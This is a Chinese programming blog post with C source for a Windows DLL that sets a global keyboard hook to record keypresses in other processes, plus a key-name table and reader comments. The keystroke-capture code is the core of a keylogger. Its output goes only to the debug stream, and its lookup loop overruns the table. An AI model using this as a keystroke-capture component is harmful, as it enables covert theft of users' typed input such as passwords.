Code - Windows 获取键盘记录
博客专区 > NDSM 的博客 > 博客详情
Code - Windows 获取键盘记录
NDSM 发表于3年前
Code - Windows 获取键盘记录
  • 发表于 3年前
  • 阅读 1155
  • 收藏 12
  • 点赞 0
  • 评论 2

腾讯云 学生专属云服务套餐 10元起购>>>   

摘要: 钩子(Hook),是Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,在目标窗口处理函数之前处理它。钩子机制允许应用程序截获处理window消息或特定事件。 钩子实际上是一个处理消息的程序段,通过系统调用,把它挂入系统。每当特定的消息发出,在没有到达目的窗口前,钩子程序就先捕获该消息,亦即钩子函数先得到控制权。这时钩子函数即可以加工处理(改变)该消息,也可以不作处理而继续传递该消息,还可以强制结束消息的传递。

MSDN上有说明 要HOOK同一桌面下的所有进程 则HOOK必须是在一个动态库中

hook.h

__declspec(dllexport) void setHook(); //导出声明
__declspec(dllexport) void unHook();


/*
LIBRARY	HOOK
EXPORTS
setHook @1
*/

hook.c

#include "hook.h"

#include <Windows.h>
#include <stdio.h>
#include "keyInfo.h"

HHOOK g_hHook=0;
extern const KeyName g_KeyNames[];


char* findKetName(int VK)
{
	static char buf[128]={0};
	int i=0;

	strcpy(buf," ");
	for(i=0;i<sizeof(g_KeyNames);i++)
	{
		if(i == VK)
		{
			strcat(strcpy(buf,g_KeyNames[i].name),"\r\n");
		}
	}
	return buf;
}

LRESULT CALLBACK HookProc(int nCode, WPARAM wParam, LPARAM lParam)
{
	if(nCode == HC_ACTION)
	{
		if( !(lParam & 0x80000000))//按键按下 要加判断否则键盘消息会回响应两次(键盘按下和弹起)
		{
			OutputDebugString(findKetName(wParam));
		}
	}
	return CallNextHookEx(g_hHook,nCode,wParam,lParam);
}

void setHook()
{
	if(!g_hHook)
	{
		g_hHook = SetWindowsHookEx(WH_KEYBOARD,HookProc,GetModuleHandle("HOOK"),0);
	}
}

void unHook()
{
	if ( g_hHook )
	{
		UnhookWindowsHookEx(g_hHook);
	}
}

 

键盘索引

keyInfo.h

typedef struct 
{
	int vk;
	char name[32];
}KeyName;

const KeyName g_KeyNames[] = {
	{0,                             ""},
	{VK_LBUTTON,			"Left mouse button"},
	{VK_RBUTTON,			"Right mouse button"},
	{VK_CANCEL,             "Break"},
	{VK_MBUTTON,			"Middle mouse button"},
	{0x05,                  "X1 mouse button"},     // VK_XBUTTON1
	{0x06,                  "X2 mouse button"},     // VK_XBUTTON2
	{0x07,                  "Undefined"},
	{VK_BACK,               "Backspace"},
	{VK_TAB,                "Tab"},
	{0x0a,                  "Reserved"},
	{0x0b,                  "Reserved"},
	{VK_CLEAR,              "Clear"},
	{VK_RETURN,             "Enter"},
	{0x0e,                  "Undefined"},
	{0x0f,                  "Undefined"},
	{VK_SHIFT,              "Shift"},
	{VK_CONTROL,			"Ctrl"},
	{VK_MENU,               "Alt"},
	{VK_PAUSE,              "Pause"},
	{VK_CAPITAL,			"Caps Lock"},
	{VK_KANA,               "Kana"},
	{0x16,                  "Undefined"},
	{VK_JUNJA,              "Junja"},
	{VK_FINAL,              "Final"},
	{VK_KANJI,              "Kanji"},
	{0x1a,                  "Undefined"},
	{VK_ESCAPE,             "Esc"},
	{VK_CONVERT,			"Convert"},
	{VK_NONCONVERT,			"Nonconvert"},
	{VK_ACCEPT,             "Accept"},
	{VK_MODECHANGE,			"Mode change"},
	{VK_SPACE,              "Space"},
	{VK_PRIOR,              "Page Up"},
	{VK_NEXT,               "Page Down"},
	{VK_END,                "End"},
	{VK_HOME,               "Home"},
	{VK_LEFT,               "Left"},
	{VK_UP,                 "Up"},
	{VK_RIGHT,              "Right"},
	{VK_DOWN,               "Down"},
	{VK_SELECT,             "Select"},
	{VK_PRINT,              "Print"},
	{VK_EXECUTE,			"Execute"},
	{VK_SNAPSHOT,			"Print Screen"},
	{VK_INSERT,             "Ins"},
	{VK_DELETE,             "Del"},
	{VK_HELP,               "Help"},
	{'0',                   "0"},
	{'1',                   "1"},
	{'2',                   "2"},
	{'3',                   "3"},
	{'4',                   "4"},
	{'5',                   "5"},
	{'6',                   "6"},
	{'7',                   "7"},
	{'8',                   "8"},
	{'9',                   "9"},
	{0x3a,                  "Undefined"},
	{0x3b,                  "Undefined"},
	{0x3c,                  "Undefined"},
	{0x3d,                  "Undefined"},
	{0x3e,                  "Undefined"},
	{0x3f,                  "Undefined"},
	{0x40,                  "Undefined"},
	{'A',                   "A"},
	{'B',                   "B"},
	{'C',                   "C"},
	{'D',                   "D"},
	{'E',                   "E"},
	{'F',                   "F"},
	{'G',                   "G"},
	{'H',                   "H"},
	{'I',                   "I"},
	{'J',                   "J"},
	{'K',                   "K"},
	{'L',                   "L"},
	{'M',                   "M"},
	{'N',                   "N"},
	{'O',                   "O"},
	{'P',                   "P"},
	{'Q',                   "Q"},
	{'R',                   "R"},
	{'S',                   "S"},
	{'T',                   "T"},
	{'U',                   "U"},
	{'V',                   "V"},
	{'W',                   "W"},
	{'X',                   "X"},
	{'Y',                   "Y"},
	{'Z',                   "Z"},
	{VK_LWIN,               "Left Windows"},
	{VK_RWIN,               "Right Windows"},
	{VK_APPS,               "Application"},
	{0x5e,                  "Reserved"},
	{0x5f,                  "Sleep"},//VK_SLEEP
	{VK_NUMPAD0,			"Num 0"},
	{VK_NUMPAD1,			"Num 1"},
	{VK_NUMPAD2,			"Num 2"},
	{VK_NUMPAD3,			"Num 3"},
	{VK_NUMPAD4,			"Num 4"},
	{VK_NUMPAD5,			"Num 5"},
	{VK_NUMPAD6,			"Num 6"},
	{VK_NUMPAD7,			"Num 7"},
	{VK_NUMPAD8,			"Num 8"},
	{VK_NUMPAD9,			"Num 9"},
	{VK_MULTIPLY,			"Num *"},
	{VK_ADD,				"Num +"},
	{VK_SEPARATOR,			"Separator"},
	{VK_SUBTRACT,			"Num -"},
	{VK_DECIMAL,			"Num ."},
	{VK_DIVIDE,             "Num /"},
	{VK_F1,                 "F1"},
	{VK_F2,                 "F2"},
	{VK_F3,                 "F3"},
	{VK_F4,                 "F4"},
	{VK_F5,                 "F5"},
	{VK_F6,                 "F6"},
	{VK_F7,                 "F7"},
	{VK_F8,                 "F8"},
	{VK_F9,                 "F9"},
	{VK_F10,                "F10"},
	{VK_F11,                "F11"},
	{VK_F12,                "F12"},
	{VK_F13,                "F13"},
	{VK_F14,                "F14"},
	{VK_F15,                "F15"},
	{VK_F16,                "F16"},
	{VK_F17,                "F17"},
	{VK_F18,                "F18"},
	{VK_F19,                "F19"},
	{VK_F20,                "F20"},
	{VK_F21,                "F21"},
	{VK_F22,                "F22"},
	{VK_F23,                "F23"},
	{VK_F24,                "F24"},
	{0x88,                  "Unassigned"},
	{0x89,                  "Unassigned"},
	{0x8a,                  "Unassigned"},
	{0x8b,                  "Unassigned"},
	{0x8c,                  "Unassigned"},
	{0x8d,                  "Unassigned"},
	{0x8e,                  "Unassigned"},
	{0x8f,                  "Unassigned"},
	{VK_NUMLOCK,			"Num Lock"},
	{VK_SCROLL,             "Scroll Lock"},
	{0x92,                  "OEM specific"},
	{0x93,                  "OEM specific"},
	{0x94,                  "OEM specific"},
	{0x95,                  "OEM specific"},
	{0x96,                  "OEM specific"},
	{0x97,                  "Unassigned"},
	{0x98,                  "Unassigned"},
	{0x99,                  "Unassigned"},
	{0x9a,                  "Unassigned"},
	{0x9b,                  "Unassigned"},
	{0x9c,                  "Unassigned"},
	{0x9d,                  "Unassigned"},
	{0x9e,                  "Unassigned"},
	{0x9f,                  "Unassigned"},
	{VK_LSHIFT,             "Left Shift"},
	{VK_RSHIFT,             "Right Shift"},
	{VK_LCONTROL,			"Left Ctrl"},
	{VK_RCONTROL,			"Right Ctrl"},
	{VK_LMENU,              "Left Alt"},
	{VK_RMENU,              "Right Alt"},
	{0xa6,                  "Browser Back"},        // VK_BROWSER_BACK
	{0xa7,                  "Browser Forward"},		// VK_BROWSER_FORWARD
	{0xa8,                  "Browser Refresh"},		// VK_BROWSER_REFRESH
	{0xa9,                  "Browser Stop"},		// VK_BROWSER_STOP
	{0xaa,                  "Browser Search"},		// VK_BROWSER_SEARCH
	{0xab,                  "Browser Favorites"},   // VK_BROWSER_FAVORITES
	{0xac,                  "Browser Start"},		// VK_BROWSER_HOME
	{0xad,                  "Volume Mute"},			// VK_VOLUME_MUTE
	{0xae,                  "Volume Down"},			// VK_VOLUME_DOWN
	{0xaf,                  "Volume Up"},			// VK_VOLUME_UP
	{0xb0,                  "Next Track"},			// VK_MEDIA_NEXT_TRACK
	{0xb1,                  "Previous Track"},		// VK_MEDIA_PREV_TRACK
	{0xb2,                  "Stop Media"},			// VK_MEDIA_STOP
	{0xb3,                  "Play/Pause Media"},    // VK_MEDIA_PLAY_PAUSE
	{0xb4,                  "Start Mail"},			// VK_LAUNCH_MAIL
	{0xb5,                  "Select Media"},		// VK_LAUNCH_MEDIA_SELECT
	{0xb6,                  "Start Application 1"}, // VK_LAUNCH_APP1
	{0xb7,                  "Start Application 2"}, // VK_LAUNCH_APP2
	{0xb8,                  "Reserved"},
	{0xb9,                  "Reserved"},
	{0xba,                  ";"},					// VK_OEM_1
};

 

标签: HOOK 消息 WIN32
共有 人打赏支持
粉丝 13
博文 47
码字总数 24990
评论 (2)
kname
難在 RING0
NDSM

引用来自“fkname”的评论

難在 RING0
别说RING0了就连浏览器或者QQ上都HOOK不到 目前只试过在记事本可以
×
NDSM
如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!
* 金额(元)
¥1 ¥5 ¥10 ¥20 其他金额
打赏人
留言
* 支付类型
微信扫码支付
打赏金额:
已支付成功
打赏金额: